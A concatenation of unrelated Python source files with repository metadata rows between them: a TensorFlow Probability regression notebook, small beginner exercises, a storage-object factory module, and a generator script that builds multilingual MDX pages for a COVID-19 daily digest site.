y_test = y[n // 2 :]
plt.plot(x, y, ".")
plt.xlabel("x")
plt.ylabel("y")
plt.title("Weird looking data")
plt.show()
# %% [markdown]
# ## Linear regression approach
# We can fit a linear regression model using tensorflow.
# This model would have no hidden layers, so the output can only be a linear weighted sum of the input and a bias.
# We optimise for the mean squared error, which is the standard loss function for linear regression.
# %%
model_lin_reg = tf.keras.Sequential(
[tf.keras.layers.Input(shape=(1,)), tf.keras.layers.Dense(1)]
)
model_lin_reg.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.01),
loss=tf.keras.losses.mse,
metrics=[tf.keras.losses.mse],
)
history = model_lin_reg.fit(x_train, y_train, epochs=10, verbose=0)
# Model has converged fine:
plt.plot(history.history["loss"])
plt.show()
print(f"""Final loss: {history.history["loss"][-1]:0.2f}""")
# %% [markdown]
# We'll define a couple helper functions to plot results:
# %%
def plot_results(x, y, y_est_mu, y_est_std=None):
plt.figure(figsize=(10, 6))
plt.plot(x, y, ".", label="y")
plt.plot(x, y_est_mu, "-y", label="y_est_mu")
if y_est_std is not None:
plt.plot(x, y_est_mu + 2 * y_est_std, "-r", label="mu+2std")
plt.plot(x, y_est_mu - 2 * y_est_std, "-r", label="mu-2std")
plt.legend()
plt.show()
def plot_model_results(model, x, y, tfp_model: bool = True):
model.weights
si = np.argsort(x)
x = x[si]
y = y[si]
yhat = model(x)
if tfp_model:
y_est_mu = yhat.mean()
y_est_std = yhat.stddev()
else:
y_est_mu = yhat
y_est_std = np.nan
plot_results(x, y, y_est_mu, y_est_std)
# %% [markdown]
# Plotting the fitted results from the linear regression shows it cannot capture the non-linearity of the data.
# The standard deviation of the model residuals doesn't affect the converged regression coefficients so it is not plotted.
# %%
plot_model_results(model_lin_reg, x_train, y_train, tfp_model=False)
# %% [markdown]
# ## Tensorflow probability
# We can fit the same model above by maximising the likelihood of a normal distribution, where the mean is the estimates of the linear regression model.
# This can be built within tensorflow probability.
# The `DistributionLambda` is used to send the outputs of the `Dense` layer to the inputs of the distribution output layer.
# The standard deviation is initially set to a static value.
# %%
def negloglik(y, distr):
return -distr.log_prob(y)
model_lin_reg_tfp = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(1),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(loc=t, scale=5,)
),
]
)
model_lin_reg_tfp.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_lin_reg_tfp.fit(x_train, y_train, epochs=20, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_lin_reg_tfp, x_train, y_train, tfp_model=True)
# %% [markdown]
# ## Fit linear regression with its standard deviation
# In order to fit the optimal standard deviation of the linear regression model we do a couple of things.
# We need the network to output two nodes, one for the mean as before and one for the standard deviation.
# Using the `DistributionLambda` layer we feed the two parameters appropriately.
# The softplus function is used to constrain the standard deviation to be positive.
# %%
model_lin_reg_std_tfp = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_lin_reg_std_tfp.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.1), loss=negloglik
)
history = model_lin_reg_std_tfp.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_lin_reg_std_tfp, x_train, y_train, tfp_model=True)
# %% [markdown]
# The above plot shows that both the standard deviation and mean are tuned differently to before.
# They both increase with the x variable.
# However they are still not great fits for the data, as they don't capture the non-linearities.
#
# ## Neural network approach
# To help fit the non-linearities we see in the relationship between x and y we can utilise a neural network.
# This can simply be the same tensorflow model we designed about, but with a hidden layer with a non-linear activation function.
# The sigmoid activation function was used as it is smooth and continuous, similar to our training data.
# %%
model_lin_reg_std_nn_tfp = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(10, activation="sigmoid"),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_lin_reg_std_nn_tfp.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_lin_reg_std_nn_tfp.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_lin_reg_std_nn_tfp, x_train, y_train, tfp_model=True)
# %% [markdown]
# The fitted means from the neural network model follow the data non-linearity much better than the linear regression case.
#
# ## Results
# We run the models against the train and test sets. There is not a large performance change between the two on any model.
# So overfitting doesn't seem to be an issue. we can see that the neural network model performs best on both the training and test sets.
# %% Test set likelihood
results = pd.DataFrame(index=["Train", "Test"])
models = {
"Linear regression": model_lin_reg_tfp,
"Linear regression + std": model_lin_reg_std_tfp,
"Neural network + std": model_lin_reg_std_nn_tfp,
}
for model in models:
results[model] = [
tf.reduce_mean(
negloglik(y_train[:, tf.newaxis], models[model](x_train))
).numpy(),
tf.reduce_mean(
negloglik(y_test[:, tf.newaxis], models[model](x_test))
).numpy(),
]
results.transpose()
# %% [markdown]
# ## Extra little bit: Activation functions
# Using the same network with different activation functions helps motivate our choice of sigmoid.
# The following creates the same network with either a relu or softplus activation function.
# Both of these act as sort of step functions, with the softplus being a smooth that relu.
# First the results from relu network:
# %% Relu activation function
model_relu = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(10, activation="relu"),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_relu.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_relu.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_relu, x_train, y_train)
# %% [markdown]
# Then with softplus:
# %% softplus activation function
model_softplus = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(10, activation="softplus"),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_softplus.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_softplus.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_softplus, x_train, y_train)
# %% [markdown]
# We can see that the sigmoid based network has the best performance:
# %%
results = pd.DataFrame(index=["Train", "Test"])
models = {
"Linear regression": model_lin_reg_tfp,
"Linear regression + std": model_lin_reg_std_tfp,
"Neural network + std": model_lin_reg_std_nn_tfp,
"Neural network relu": model_relu,
"Neural network softplus": model_softplus,
}
for model in models:
results[model] = [
tf.reduce_mean(
negloglik(y_train[:, tf.newaxis], models[model](x_train))
).numpy(),
tf.reduce_mean(
negloglik(y_test[:, tf.newaxis], models[model](x_test))
).numpy(),
]
results.transpose()
| 34.432056 | 152 | 0.69065 |
ef6303b465410a24d5e7bd82a0031a969bc5d56c
| 42 |
py
|
Python
|
Tag_01/a-03_hello_world.py
|
MrMontag/internship-june-2021
|
44bcf06c50535c0cadee3d305b0a0da9653b1cf1
|
[
"CC0-1.0"
] | null | null | null |
Tag_01/a-03_hello_world.py
|
MrMontag/internship-june-2021
|
44bcf06c50535c0cadee3d305b0a0da9653b1cf1
|
[
"CC0-1.0"
] | null | null | null |
Tag_01/a-03_hello_world.py
|
MrMontag/internship-june-2021
|
44bcf06c50535c0cadee3d305b0a0da9653b1cf1
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/python3
print("Hallo World!")
| 10.5 | 21 | 0.666667 |
32603680c3393bee4e46c1ae84c7814e6c012fd4
| 384 |
py
|
Python
|
PINp/2015/GOLOVIN_A_I/task_1_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2015/GOLOVIN_A_I/task_1_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2015/GOLOVIN_A_I/task_1_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 1. Вариант 7.
# Напишите программу, которая будет сообщать род деятельности и псевдоним под которым скрывается # Эдуард Георгиевич Зюбин. После вывода информации программа должна дожидаться пока пользователь # нажмет Enter для выхода.# Golovin.A.I
# 02.06.2016
print ("Эдуард Георгиевич Зюбин, более известный как Шубин - писатель")
input("\n\nНажмите Enter для выхода.")
| 54.857143 | 233 | 0.783854 |
f5fcb3c996c5806487a0c1b1d6b82c9a8945c5ca
| 393 |
py
|
Python
|
volley/data_models.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 8 |
2022-02-24T14:59:24.000Z
|
2022-03-31T04:37:55.000Z
|
volley/data_models.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 3 |
2022-02-27T17:08:52.000Z
|
2022-03-18T13:11:01.000Z
|
volley/data_models.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 2 |
2022-02-24T15:03:07.000Z
|
2022-03-15T03:12:00.000Z
|
# Copyright (c) Shipt, Inc.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import TypeVar
from volley.models.pydantic_model import GenericMessage, QueueMessage
GenericMessageType = TypeVar("GenericMessageType", bound=GenericMessage)
__all__ = ["GenericMessage", "QueueMessage", "GenericMessageType"]
| 32.75 | 72 | 0.796438 |
26e6facfb72def484f8b4d8418af2a0176ae6452
| 4,185 |
py
|
Python
|
quark_core_api/data/storage/storage_factory.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
quark_core_api/data/storage/storage_factory.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
quark_core_api/data/storage/storage_factory.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
import os, six, abc
from copy import deepcopy
from attrdict import AttrDict
from future.utils import viewitems
from future.builtins import super
from app_settings import Config
from quark_core_api.data.storage import CollectionObject, ComplexObject, KeyValueObject, Validator
from quark_core_api.common import DelayedEventHandler
from quark_core_api.exceptions import InvalidOperationException
class StorageObjectFactory(object):
def __init__(self, object_types=None):
self._object_type_map = {}
if not object_types:
object_types = self._get_default_object_types()
self._create_object_type_map(object_types)
def create(self, id, data, validator):
value_type = type(data[id])
storage_object = self._object_type_map[value_type]
return storage_object(id, data, validator)
def _create_object_type_map(self, object_types):
for value_type, object_type in object_types:
self._object_type_map[value_type] = object_type
def _get_default_object_types(self):
yield (list, CollectionObject)
yield (dict, ComplexObject)
yield (str, KeyValueObject)
yield (int, KeyValueObject)
yield (float, KeyValueObject)
yield (bool, KeyValueObject)
@six.add_metaclass(abc.ABCMeta)
class StorageBase(object):
def __init__(self, data, schema=None):
self.__data__ = data
self.__schema__ = schema
self.__objects__ = []
self._object_factory = StorageObjectFactory()
self.object_changed = DelayedEventHandler()
self._create_objects(data, schema)
@property
def data(self):
return deepcopy(self.__data__)
@property
def schema(self):
return deepcopy(self.__schema__)
@property
def entries(self):
return deepcopy(self.__objects__)
def create_entry(self, data, schema=None):
for object_name, value in viewitems(data):
if object_name in self.__data__:
raise InvalidOperationException(
"Invalid data provided. Key already exists.")
self.__data__[object_name] = value
self._create_objects(data, schema)
def _create_objects(self, data, schema):
for object_name in data:
if schema and object_name in schema:
validator = Validator(schema[object_name])
else:
validator = None
storage_object = self._object_factory.create(object_name, data, validator)
storage_object.on_change += self._on_object_change
self.__objects__.append(object_name)
setattr(self, object_name, storage_object)
self.object_changed(storage_object)
def _on_object_change(self, sender, action=None):
self.object_changed(self, changed_object=sender)
def __getitem__(self, key):
return getattr(self, key)
class InMemoryStorage(StorageBase):
def __init__(self, name, data, schema=None):
super().__init__(AttrDict(data), schema=schema)
self.name = name
class FileStorage(StorageBase):
def __init__(self,
path,
default_type=None,
initializer=None,
schema=None,
auto_create=False):
self._path = path
file_exists = os.path.isfile(path)
self._filestore = Config(path,
default=default_type,
auto_create=auto_create)
self.name = self._filestore.files[0]
if not file_exists and initializer:
self._initialize(initializer)
self._filestore.save_all()
super().__init__(self._filestore[self.name], schema)
def _on_object_change(self, sender, action=None):
self._filestore.save_all()
super()._on_object_change(sender, action=action)
def _initialize(self, initializer):
for object_name, value in viewitems(initializer):
if not object_name in self._filestore[self.name]:
self._filestore[self.name][object_name] = value
| 32.44186 | 98 | 0.649223 |
f8c0e8bc48ef9ad008382516f69ada57a83115d7
| 13,276 |
py
|
Python
|
src/manual-md/page_generator.py
|
MisterFISHUP/covid-19-in-france
|
022dec339008a16016358f2bf4612525772c33dd
|
[
"Apache-2.0"
] | 8 |
2021-04-20T09:57:56.000Z
|
2021-12-05T16:52:37.000Z
|
src/manual-md/page_generator.py
|
MisterFISHUP/covid-19-in-france
|
022dec339008a16016358f2bf4612525772c33dd
|
[
"Apache-2.0"
] | 5 |
2021-05-15T10:43:58.000Z
|
2021-10-10T16:25:48.000Z
|
src/manual-md/page_generator.py
|
MisterFISHUP/covid-19-in-france
|
022dec339008a16016358f2bf4612525772c33dd
|
[
"Apache-2.0"
] | 5 |
2021-05-02T06:36:07.000Z
|
2021-09-11T17:42:40.000Z
|
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %% [markdown]
# ## Import modules and define global constants
# %%
# this py file is generated from notebook (ipynb file)
import shutil
from pathlib import Path
from datetime import date, timedelta
from opencc import OpenCC
digest_start = date(2020, 3, 1)
start_year = 2020
cur_year = 2021
lastest_month = 10
lastest_day = 9
one_day = timedelta(days=1)
# not using strftime("%B") for months since it depends on the current locale
month_en = ('January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December')
month_fr = ('janvier', 'février', 'mars', 'avril', 'mai', 'juin', 'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre')
weekday_zh_hant = ('週一', '週二', '週三', '週四', '週五', '週六', '週日')
weekday_zh_hans = ('周一', '周二', '周三', '周四', '周五', '周六', '周日')
weekday_en = ('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')
weekday_fr = ('lundi', 'mardi', 'mercredi', 'jeudi', 'vendredi', 'samedi', 'dimanche')
# %% [markdown]
# ## Get manual md path and content
# %%
def path_manual(y, m, d, locale='zh-Hant'):
'''
Return path like `./manual[_{locale}]/2020/3/18.md`
'''
dir_name = 'manual' if locale == 'zh-Hant' else f'manual_{locale}'
return Path(dir_name, str(y), str(m), f'{d}.md')
def manual_content(y, m, d, locale='zh-Hant'):
md_file = path_manual(y, m, d)
md_file_sc = path_manual(y, m, d, 'zh-Hans')
if locale == 'zh-Hant':
if Path(md_file).is_file():
with open(md_file, 'r') as f:
content = f.read()
return content
return ''
if locale == 'zh-Hans':
if Path(md_file_sc).is_file():
with open(md_file_sc, 'r') as f:
content = f.read()
return content
else:
t2s = OpenCC('tw2sp.json')
return t2s.convert(manual_content(y, m, d))
# for any other locales
return ''
# manual_content(2021,3,1,'zh-Hans')
# %% [markdown]
# ## Generate digest content string
#
# For mdx that will be generated
# %%
def digest_content(y, m, d, locale='zh-Hant'):
'''Return the string for the page of y/m/d'''
dt = date(y, m, d)
man = manual_content(y, m, d, locale)
front_matter = f'''---
title: {y} 年 {m} 月 {d} 日({weekday_zh_hant[dt.weekday()]})
sidebar_label: {m} 月 {d} 日({weekday_zh_hant[dt.weekday()]})
description: {y} 年 {m} 月 {d} 日法國新冠肺炎疫情匯報。法國 COVID-19 日誌第 {(dt - digest_start).days + 1} 篇。
---
'''
export_import = f'''
export const date = "{dt.strftime('%Y-%m-%d')}";
import {{ Subtitle, Grace, Fish, OfficialData, SourceFb, Figure, ChartCases }} from "@site/src/scripts/digest-components";
import {{ DigestLinkButton }} from "@site/src/scripts/components/DigestLinkButton";
'''
subtitle = '''
<Subtitle date={date} />
'''
main_img = '''
<Figure date={date}></Figure>
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 數據來源:請參考附錄<a href="../../sources">資料來源</a>。</div>
'''
chartCases = '''
<ChartCases date={date} />
'''
official_data_heading = '''
## 法國官方數據 {#official-statistics}
'''
official_data = '''
<OfficialData date={date} />
'''
news_only_zh = ''
sourceFb = '''
<SourceFb date={date} />
'''
news_heading = '''
## 本日新聞重點 {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 閱讀隨機一篇日誌" />
</div>
'''
# overwrite some strings for `zh-Hans`
if locale == 'zh-Hans':
front_matter = f'''---
title: {y} 年 {m} 月 {d} 日({weekday_zh_hans[dt.weekday()]})
sidebar_label: {m} 月 {d} 日({weekday_zh_hans[dt.weekday()]})
description: {y} 年 {m} 月 {d} 日法国新冠肺炎疫情汇报。法国 COVID-19 日志第 {(dt - digest_start).days + 1} 篇。
---
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 数据来源:请参考附录<a href="../../sources">数据源</a>。</div>
'''
official_data_heading = '''
## 法国官方数据 {#official-statistics}
'''
news_heading = '''
## 本日新闻重点 {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 阅读随机一篇日志" />
</div>
'''
# overwrite some strings for `en`
if locale == 'en':
front_matter = f'''---
title: {weekday_en[dt.weekday()]}, {d} {month_en[m-1]} {y}
sidebar_label: {weekday_en[dt.weekday()][:3]}. {d} {month_en[m-1]}
description: Daily digest of COVID-19 in France on {d} {month_en[m-1]} {y}. Day {(dt - digest_start).days + 1}.
---
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 Data sources: see <a href="../../sources">Appendix - Sources</a>.</div>
'''
official_data_heading = '''
## Official Statistics {#official-statistics}
'''
news_only_zh = '''
<div className="comment--translc_gray">📢 For the COVID-19 Daily News Digest, it is only available in <strong>traditional Chinese</strong> and <strong>simplified Chinese</strong> at the moment.</div><br />
'''
news_heading = '''
## COVID-19 Daily News Digest {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 Read a random digest" />
</div>
'''
# overwrite some strings for `fr`
if locale == 'fr':
front_matter = f'''---
title: {weekday_fr[dt.weekday()].capitalize()} {d} {month_fr[m-1]} {y}
sidebar_label: {weekday_fr[dt.weekday()][:3]}. {d} {month_fr[m-1]}
description: Résumé quotidien du COVID-19 en France le {d} {month_fr[m-1]} {y}. Jour {(dt - digest_start).days + 1}.
---
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 Sources des données : voir <a href="../../sources">Appendice - Sources</a>.</div>
'''
official_data_heading = '''
## Statistiques officielles {#official-statistics}
'''
news_only_zh = '''
<div className="comment--translc_gray">📢 Pour l'actualité en bref du COVID-19, elle n'est pour le moment disponible qu'en <strong>chinois traditionnel</strong> et en <strong>chinois simplifié</strong>.</div><br />
'''
news_heading = '''
## Actualité en bref {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 Lire un résumé aléatoire" />
</div>
'''
if man:
man = '\n' + man + '\n'
else:
sourceFb = ''
news_heading = ''
# There's no data for 2020/3/1
if dt == date(2020,3,1):
return front_matter + export_import + subtitle + main_img + man + random_digest_button
return front_matter + export_import + subtitle + main_img + sourceOfData + chartCases + official_data_heading + official_data + news_only_zh + sourceFb + news_heading + man + random_digest_button
# print(digest_content(2021,3,2, 'fr'))
# %% [markdown]
# ## Generate digest pages
#
# Generate
# - `/docs/{year}/{month_en_lower}/{day}.mdx`
# - `/i18n/{locale}/docusaurus-plugin-content-docs/current/{year}/{month_en_lower}/{day}.mdx`
# with content given by `digest_content` function
#
# Note: Should generate pages ONLY for dates after 2020/3/1 (included)
# %%
def generate_a_page(y, m, d):
'''
Generate the digest page of date d/m/y for zh-Hant, zh-Hans, en and fr
'''
folder = Path('..', '..', 'docs', str(y), month_en[m-1].lower())
folder_sc = Path('..', '..', 'i18n', 'zh-Hans', 'docusaurus-plugin-content-docs', 'current', str(y), month_en[m-1].lower())
folder_en = Path('..', '..', 'i18n', 'en', 'docusaurus-plugin-content-docs', 'current', str(y), month_en[m-1].lower())
folder_fr = Path('..', '..', 'i18n', 'fr', 'docusaurus-plugin-content-docs', 'current', str(y), month_en[m-1].lower())
mdx = Path(folder, f'{d}.mdx')
mdx_sc = Path(folder_sc, f'{d}.mdx')
mdx_en = Path(folder_en, f'{d}.mdx')
mdx_fr = Path(folder_fr, f'{d}.mdx')
# write file: zh-Hant
folder.mkdir(parents=True, exist_ok=True)
with open(mdx, 'w') as f:
f.write(digest_content(y, m, d))
# write file: zh-Hans
folder_sc.mkdir(parents=True, exist_ok=True)
with open(mdx_sc, 'w') as f:
f.write(digest_content(y, m, d, 'zh-Hans'))
# write file: en
folder_en.mkdir(parents=True, exist_ok=True)
with open(mdx_en, 'w') as f:
f.write(digest_content(y, m, d, 'en'))
# write file: fr
folder_fr.mkdir(parents=True, exist_ok=True)
with open(mdx_fr, 'w') as f:
f.write(digest_content(y, m, d, 'fr'))
print(f'> generated mdx for {y}/{m}/{d} in `/docs/` and `/i18n/{{locale}}/docusaurus-plugin-content-docs/current/`')
def generate_pages(s_y, s_m, s_d, e_y, e_m, e_d):
s_dt = date(s_y, s_m, s_d)
e_dt = date(e_y, e_m, e_d)
n_pages = (e_dt - s_dt).days + 1
if n_pages < 2:
raise Exception("The ending date should be at least one day after the starting day.")
prompt = f'writing {n_pages} pages: from {s_y}/{s_m}/{s_d} to {e_y}/{e_m}/{e_d} in zh-Hant, zh-Hans, en and fr'
print(f'Start {prompt}...')
dt = s_dt
while (dt != e_dt + one_day):
generate_a_page(dt.year, dt.month, dt.day)
dt += one_day
print(f'Finish {prompt}.')
# generate_pages(2020,3,9,2020,3,10)
# %% [markdown]
# ## Create `intro.mdx` by copying manual `intro.md`
#
# Copy `./manual/{cur_year}/intro.md` to `/docs/{cur_year}/intro.mdx`
#
# Copy `./manual_{locale}/{cur_year}/intro.md` to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`
# %%
def create_intro_mdx(locale='zh-Hant'):
'''
Copy `./manual/{cur_year}/intro.md` to `/docs/{cur_year}/intro.mdx`,
or `./manual_{locale}/{cur_year}/intro.md` to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`.
'''
intro_root_dir_from = 'manual' if locale == 'zh-Hant' else f'manual_{locale}'
intro_md_from = Path(intro_root_dir_from, str(cur_year), 'intro.md')
intro_dir_to = Path('..', '..', 'docs', str(cur_year)) if locale == 'zh-Hant' else Path('..', '..', 'i18n', locale, 'docusaurus-plugin-content-docs', 'current', str(cur_year))
intro_md_to = Path(intro_dir_to, 'intro.mdx')
# if intro md file doesn't exist, raise an error
if not intro_md_from.is_file():
if locale == 'zh-Hant':
raise Exception(f"File `./manual/{cur_year}/intro.md` doesn't exist, can't copy it to `/docs/{cur_year}/intro.mdx`.")
else:
raise Exception(f"File `./manual_{locale}/{cur_year}/intro.md` doesn't exist, can't copy it to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`.")
# intro md file exists as expected, so copy it
else:
intro_dir_to.mkdir(parents=True, exist_ok=True)
shutil.copy(intro_md_from, intro_md_to)
# prompt: copy finished
if locale == 'zh-Hant':
print(f'Copied `./manual/{cur_year}/intro.md` to `/docs/{cur_year}/intro.mdx`.')
else:
print(f'Copied `./manual_{locale}/{cur_year}/intro.md` to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`.')
# create_intro_mdx('zh-Hant')
# %% [markdown]
# ## Clear generated pages
#
# Delete folders `/docs/{year}/`, `/i18n/{locale}/docusaurus-plugin-content-docs/current/{year}/` and all their contents
# %%
def clear_generated_pages():
'''
Delete folders `/docs/{year}/`, `/i18n/{locale}/docusaurus-plugin-content-docs/current/{year}/` and all their contents
'''
print('Start clearing generated files...')
for y in range(start_year, cur_year + 2):
dir_to_delete = Path('..', '..', 'docs', str(y))
dir_to_delete_sc = Path('..', '..', 'i18n', 'zh-Hans', 'docusaurus-plugin-content-docs', 'current', str(y))
dir_to_delete_en = Path('..', '..', 'i18n', 'en', 'docusaurus-plugin-content-docs', 'current', str(y))
dir_to_delete_fr = Path('..', '..', 'i18n', 'fr', 'docusaurus-plugin-content-docs', 'current', str(y))
if dir_to_delete.is_dir():
shutil.rmtree(dir_to_delete)
print(f"> deleted folder `{y}` in `/docs/` (as well as all its contents)")
if dir_to_delete_sc.is_dir():
shutil.rmtree(dir_to_delete_sc)
print(f"> deleted folder `{y}` in `/i18n/zh-Hans/docusaurus-plugin-content-docs/current/` (as well as all its contents)")
if dir_to_delete_en.is_dir():
shutil.rmtree(dir_to_delete_en)
print(f"> deleted folder `{y}` in `/i18n/en/docusaurus-plugin-content-docs/current/` (as well as all its contents)")
if dir_to_delete_fr.is_dir():
shutil.rmtree(dir_to_delete_fr)
print(f"> deleted folder `{y}` in `/i18n/fr/docusaurus-plugin-content-docs/current/` (as well as all its contents)")
print('Finish clearing generated files.')
# clear_generated_pages()
# %% [markdown]
# ## Define and execute the `main` function
# %%
def main():
clear_generated_pages()
generate_pages(2020,3,1,cur_year,lastest_month,lastest_day)
create_intro_mdx('zh-Hant')
create_intro_mdx('zh-Hans')
create_intro_mdx('en')
create_intro_mdx('fr')
main()
| 36.076087 | 213 | 0.623305 |
3e166c873f0545edf44e1c03b024dfdfc36a7abf
| 2,929 |
py
|
Python
|
Jeney/02_Exercise/ex2.py
|
appfs/appfs
|
8cbbfa0e40e4d4a75a498ce8dd894bb2fbc3a9e3
|
[
"MIT"
] | 11 |
2017-04-21T11:39:55.000Z
|
2022-02-11T20:25:18.000Z
|
Jeney/02_Exercise/ex2.py
|
appfs/appfs
|
8cbbfa0e40e4d4a75a498ce8dd894bb2fbc3a9e3
|
[
"MIT"
] | 69 |
2017-04-26T09:30:38.000Z
|
2017-08-01T11:31:21.000Z
|
Jeney/02_Exercise/ex2.py
|
appfs/appfs
|
8cbbfa0e40e4d4a75a498ce8dd894bb2fbc3a9e3
|
[
"MIT"
] | 53 |
2017-04-20T16:16:11.000Z
|
2017-07-19T12:53:01.000Z
|
#Advanced Pratical Programming For Scientists
#Assignemnt 2
#author:Viktor Jeney
#written in Python 3
#This program reads a XML and writes it into a CSV
#For each of those tasks there is a seperate function written.
#The filename to read has to be the first argument from the command line.
#The filename to write into has to be the second arguments from command line.
import sys
from bs4 import BeautifulSoup as Soup
import csv
###############################################################################
def readXML(filename):
#reads an xml file using BeautifulSoup with lxml parser
#input: name of file
#returns: list with 3 entries: date as YYYY-MM-DD, time as HH
# and value of measured power without unit
#
#initializing list to return
measurements=[]
#initializing temporary objects
currentDay=''
currentTime=''
currentPower=''
#opening file with handler
with open(filename,'r') as fileHandler:
#parse the file into an soup object using lxml parser
#note that all the tags have only lower case letters now
#because xml should't distinguish between lower and upper case
soup=Soup(fileHandler,'lxml')
#find all tags 'gasDay '
for day in soup.findAll('gasday'):
#set the date for list entry
currentDay=day.attrs['date']
#find all tags 'boundarynode'
#this is just to make sure that the rest is enclosed in a
#boundarynode tag
for node in day.findAll('boundarynode'):
#find all tags 'time'
for time in node.findAll('time'):
#set the time for list entry
currentTime=time.attrs['hour'].zfill(2)
#find all tags 'amountofpower'
for power in time.findAll('amountofpower'):
currentPower=power.attrs['value']
measurements.append([currentDay,currentTime,\
currentPower])
return measurements
###############################################################################
def writeCSV(fileName,data):
#write a CSV file with the
#input: name of file
#returns: None
#open file with handler
with open(fileName,'w') as fileHandler:
#create CSV writer
writer = csv.writer(fileHandler, delimiter=',')
#iterate through data
for line in data:
#write row
writer.writerow(line)
###############################################################################
#read filenames out of system input
inputName=sys.argv[1]
outputName=sys.argv[2]
#inputName='example.measured-1-1-0.xml'
#outputName='output.csv'
#read in the measurements
measurements=readXML(inputName)
#write the measurements into csv file
writeCSV(outputName,measurements)
| 32.544444 | 79 | 0.58211 |
9005bc1ed0035663e147c53f3cce14d31c7eb1e1
| 2,088 |
py
|
Python
|
vorl5-ueb1-regex.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb1-regex.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb1-regex.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
# 5. Vorlesung 17.10.2020, Skript Python 4 (07_Python_04.pdf)
import re
# Übung 1:
'''
1. Finden des Worts "Python" oder "python"
2. Inhalt einer gesamte Kommentarzeile
3. Ein Zeichen das eine Ziffer oder ein Vorzeichen ist (+/-)
'''
# Aufgabe 1
